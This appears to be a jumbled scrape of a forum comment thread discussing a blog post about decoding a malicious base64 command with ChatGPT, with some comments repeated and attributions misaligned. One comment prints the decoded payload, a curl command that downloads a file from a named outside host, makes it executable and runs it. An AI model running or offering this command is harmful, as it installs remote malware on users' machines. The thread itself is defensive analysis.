He asked ChatGPT to run the command in a sterile environment. He knew it was a bad idea to start with. It's a quick and dirty method in case you don't have a virgin VM lying around to try random scripts on to see what they do.
I'd say something edgy about paying attention but that wouldn't be nice.
It's a bad idea to try to execute a malicious string in any environment, but the payload is just base64 text and it's safe to decode if you understand how to use the command line.
Did ChatGPT do ANYTHING useful in this blog? No, but it probably cost more than it did when I ran base64 -d on my phone lol and if you want updoots on the Orange Site you had better mention LLMs
If I was more paranoid I could've used someone else's computer to decipher the text but I wanted to make a point.
The command helpfully already tells you where you can find a base64 decoder: it's in /usr/bin/base64.
Assuming you already have a ChatGPT window handy, which many people do these days, I don't think it's any worse to paste it there and ask the LLM to decode it, and avoid the risk that you copy and pasted the "| bash" as well.
dingnuts|4 months ago
Look, I just deciphered it in Termux on my phone:
~ $ echo "Y3VybCAtc0wgLW8gL3RtcC9wakttTVVGRVl2OEFsZktSIGh0dHBzOi8vd3d3LmFtYW5hZ2VuY2llcy5jb20vYXNzZXRzL2pzL2dyZWNhcHRjaGE7IGNobW9kICt4IC90bXAvcGpLbU1VRkVZdjhBbGZLUjsgL3RtcC9wakttTVVGRVl2OEFsZktS" | base64 -d
curl -sL -o /tmp/pjKmMUFEYv8AlfKR https://www.amanagencies.com/assets/js/grecaptcha; chmod +x /tmp/pjKmMUFEYv8AlfKR; /tmp/pjKmMUFEYv8AlfKR~ $
Did ChatGPT do ANYTHING useful in this blog? No, but it probably cost more than it did when I ran base64 -d on my phone lol and if you want updoots on the Orange Site you had better mention LLMs
If I was more paranoid I could've used someone else's computer to decipher the text but I wanted to make a point.
markrages|4 months ago
Marsymars|4 months ago
Am I "running" code if follow the control flow and say "Hello World!" out loud?
tomrod|4 months ago
netsharc|4 months ago
I'd google a base64 decoder and paste the "[some garble]" in...
dmurray|4 months ago
Assuming you already have a ChatGPT window handy, which many people do these days, I don't think it's any worse to paste it there and ask the LLM to decode it, and avoid the risk that you copy and pasted the "| bash" as well.